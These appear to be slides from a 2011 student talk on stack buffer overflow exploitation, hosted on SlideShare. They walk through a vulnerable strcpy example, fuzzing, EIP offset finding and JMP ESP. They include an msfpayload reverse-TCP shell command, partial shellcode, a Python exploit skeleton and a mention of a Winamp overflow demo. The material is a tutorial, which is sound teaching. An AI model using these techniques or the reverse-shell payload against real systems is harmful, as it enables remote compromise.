Smash The Stack!                By: @MennaEssa           FCIS Student , 2nd year.
Agenda Theory Steps : 1­Find a bug 2­verify the bug 3­Finalize and use   the shell code View from above Exploit develo...
What is ? Buffer ? Buffer over flow ? Smash the stack ? So the theory is ==>
The Theory:#include <string.h>void do_something(char *Buffer){     char MyVar[128];     strcpy(MyVar,Buffer);}int main (in...
Step1 : Find the bug Got the source code? Awesome! No?     Reversing (Fuzzing)    Simply , you can keep giving the    ...
Step2 : Verify the bug  Where is the EIP ?    Use a debugger to guide your self     Used different inputs to limit the ...
Now what? No that you have the EIP you should   be able to overwrite it with an   address where you have your evil <no?  ...
Where? Remeber when you overwrote your   EIP ? Why not use the rest of the   buffer to put it there? right   where the ES...
Get the shell code Now you control the EIP , now   where to put your shell code ./msfpayload   windows/shell/reverse_tcp...
Greet the shell code :)unsigned char buf[] ="xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30""x8bx52x0cx8bx52x14x8bx72x28x0f...
Finalize:
Finalize:#!/usr/bin/env pythonbuff = ‘A’ *26072buff += ‘x3axf2xa8x01′ # EIP overwrite   #JMP ESP address.buff += ‘CCCC’   ...
Now Add it to your code and youre done   Winamp remote buffer overflow exploitlive demo.[this flaw is triggered when a au...
The look from above... Exploit development , security   researchers the need to exist   more here :) Remember to know ho...
~# Thanks_
Upcoming SlideShare
Loading in …5
×

smash the stack , Menna Essa

1,133 views

Published on

twentyCAT event 14/5/2011

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,133
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
17
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

smash the stack , Menna Essa

  1. 1. Smash The Stack! By: @MennaEssa FCIS Student , 2nd year.
  2. 2. Agenda Theory Steps : 1­Find a bug 2­verify the bug 3­Finalize and use  the shell code View from above Exploit development ?
  3. 3. What is ? Buffer ? Buffer over flow ? Smash the stack ? So the theory is ==>
  4. 4. The Theory:#include <string.h>void do_something(char *Buffer){ char MyVar[128]; strcpy(MyVar,Buffer);}int main (int argc, char **argv){ do_something(argv[1]);}
  5. 5. Step1 : Find the bug Got the source code? Awesome! No?   Reversing (Fuzzing)  Simply , you can keep giving the  program inputs of an increasing  sizes until it crashes.
  6. 6. Step2 : Verify the bug  Where is the EIP ?  Use a debugger to guide your self   Used different inputs to limit the range  of your expectations.  Use unique patterns to find exactly  where the file is    “./pattern_create.rb  <size>“  /pattern_offset.rb <Data written in EIP>  <Size>  Youve got the EIP... Sweet!
  7. 7. Now what? No that you have the EIP you should  be able to overwrite it with an  address where you have your evil <no? > code. We call this the shell code. a shellcode is a small piece of code  used as the payload in the  exploitation of a software  vulnerability Ok...WHERE!
  8. 8. Where? Remeber when you overwrote your  EIP ? Why not use the rest of the  buffer to put it there? right  where the ESP is pointing EIP ==> ESP “DMA nope!” Use a jump op. From one of the  dlls ..   Google some resources for that ;)
  9. 9. Get the shell code Now you control the EIP , now  where to put your shell code ./msfpayload  windows/shell/reverse_tcp  LHOST=192.168.1.112 C
  10. 10. Greet the shell code :)unsigned char buf[] ="xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2""xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85""xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3""x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"….....x0fxdfxe0xffxd5x97x6a""x05x68xc0xa8x01x70x68x02x00x11x5cx89xe6x6ax10""x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4e""x08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56""x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10""x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6a""x00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6""x85xf6x75xecxc3";
  11. 11. Finalize:
  12. 12. Finalize:#!/usr/bin/env pythonbuff = ‘A’ *26072buff += ‘x3axf2xa8x01′ # EIP overwrite #JMP ESP address.buff += ‘CCCC’ # 4 bytes of garbagebuff += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""x31xc0xacx3c.....” #your shellcodef= open(some_file, ‘w’) #whatever how this will be an input to a programf.write(buff)f.close()
  13. 13. Now Add it to your code and youre done Winamp remote buffer overflow exploitlive demo.[this flaw is triggered when a audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser]
  14. 14. The look from above... Exploit development , security  researchers the need to exist  more here :) Remember to know how  You can find some neat tutorials  on isecurity , corelanec0d3r 
  15. 15. ~# Thanks_

×